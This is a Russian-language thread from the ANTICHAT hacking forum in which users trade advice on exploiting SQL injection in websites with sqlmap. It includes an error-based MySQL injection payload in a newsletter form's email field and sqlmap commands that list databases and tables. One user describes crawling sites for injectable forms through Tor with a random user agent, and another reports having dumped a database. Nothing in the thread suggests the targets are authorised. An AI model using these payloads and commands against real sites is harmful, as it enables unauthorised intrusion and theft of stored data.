ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.03.2016, 07:58
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
Провел на форуме: 69791
Репутация:
-7
|
|
Возможно ли в Sqlmap сразу задать для целевого сайта готовый payload? Почитав руководство, ничего по этому поводу не нашёл, а было бы неплохо запустить сразу с параметром нужного пайлоада и сразу же приступить к раскрутке, и не ждать несколько часов, пока он его будет перебирать.
|
|
|

04.03.2016, 10:30
|
|
Познающий
Регистрация: 09.10.2015
Сообщений: 54
Провел на форуме: 19071
Репутация:
10
|
|
Сообщение от Грабитель
↑
Возможно ли в Sqlmap сразу задать для целевого сайта готовый payload? Почитав руководство, ничего по этому поводу не нашёл, а было бы неплохо запустить сразу с параметром нужного пайлоада и сразу же приступить к раскрутке, и не ждать несколько часов, пока он его будет перебирать.
можно указать какую базу использовать (--dbms), и тип уязвимости (--technique)
работу по готовому пайлоду не находил
|
|
|

04.03.2016, 10:54
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
Провел на форуме: 69791
Репутация:
-7
|
|
Сообщение от Waki
↑
можно указать какую базу использовать (--dbms), и тип уязвимости (--technique)
работу по готовому пайлоду не находил
К сожалению, не то. Есть однотипные SQL иньекции в одном движке, но чтобы каждый URL засунуть в sqlmap, приходится ждать по нескольку часов пока он подберет под него тот же самый payload.
Пока что использую подмену url в sqlite файле для конкретного сайта в sqlmap, и думал может быть есть способ менее геморный... но видимо нету.
Ещё вопрос, столкнулся с непонятной вещью, когда из таблицы не получается извлечь никаких данных.
Вытаскиваю все базы данных, успешно вытаскиваются. Дальше вытаскиваю таблицы для конкретной базы данных, они тоже прекрасно вытаскиваются.
Но если я пытаюсь получить хоть какую то информацию из таблицы, то sqlmap не может ничего получить.
Банальный запрос --sql-query="select count(*) from my_database._my_table" и выдаёт ошибку:
Код:
[10:51:05] [INFO] retrieved:
[10:51:09] [WARNING] reflective value(s) found and filtering out
[10:51:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:52:30] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[10:52:34] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
select count(*) from my_database._my_table: None
При этом все остальные запросы по типу select version() и так далее выполняются нормально, а при попытке получить информацию из таблицы или хотя бы количество записей, вот такая ошибка выскакивает.
|
|
|

05.03.2016, 02:32
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
Провел на форуме: 69791
Репутация:
-7
|
|
Хмм, серьёзно, интересно. Запрос "select version()" выполняется нормально и выводит версию, а такой запрос: "select version() from information_schema.tables" возвращает none
На многих сайтах. И count(*) from base.table не срабатывает, так же выплёвывает или none или ошибки, если кто поможет, буду безумно рад.
|
|
|

05.03.2016, 04:15
|
|
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме: 92307
Репутация:
0
|
|
После скана сайта на уязвимость, выдало такую инфу.
Код:
sqlmap identified the following injection point(s) with a total of 275 HTTP(s) requests:
---
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mailFlag=newsletter&email=QWln' AND (SELECT 5736 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(5736=5736,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Jdzw'='Jdzw
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
и в target.txt такое
Код:
https://www.site.com/index.php?option=sentMail (POST)
mailFlag=newsletter&email=QWln
Как дальше раскручивать чтобы получить таблицы ? Интересует сам запрос sqlmap.py -u "" и что указывать.
|
|
|

05.03.2016, 10:16
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме: 216062
Репутация:
231
|
|
Код:
-u "https://www.site.com/index.php?option=sentMail" --data="mailFlag=newsletter&email=1*" --dbs --tables
|
|
|

05.03.2016, 10:20
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме: 216062
Репутация:
231
|
|
Сообщение от .Light.
↑
Как раскрутить такую скулю?
site.ru/v2-live-with-a-5-1-win/
Acunetix:
Path Fragment (suffix /) input
-
was set to
success' AND 3*2*1=6 AND '000CDY9'='000CDY9
site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/
Код:
-u "site.ru/v2-live-with-a-5-1-win*" --dbs
|
|
|

06.03.2016, 00:17
|
|
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме: 92307
Репутация:
0
|
|
Сообщение от grimnir
↑
Код:
-u "https://www.site.com/index.php?option=sentMail" --data="mailFlag=newsletter&email=1*" --dbs --tables
Почему вместо
Код:
mailFlag=newsletter&email=QWln
подставляется в POST
Код:
mailFlag=newsletter&email=1*
p.s. Базу сдампить вышло.
|
|
|

06.03.2016, 00:54
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от demontager
↑
Почему вместо
Код:
mailFlag=newsletter&email=QWln
подставляется в POST
Код:
mailFlag=newsletter&email=1*
p.s. Базу сдампить вышло.
Code:
mailFlag=newsletter&email=QWln
подставляется в POST
Code:
mailFlag=newsletter&email=1*
можно так
mailFlag=newsletter&email=*
|
|
|

06.03.2016, 04:52
|
|
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме: 92307
Репутация:
0
|
|
А как можно искать уязвимости GET запросами ? Если в качестве цели указывать корневой URL. Допустим, если POST запросы, то я так делаю
Код:
sqlmap.py -u "site.com" --forms --crawl=3 --random-agent --tor --batch
И он сам уже ищет все доступные формы и пробует их на уязвимость.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|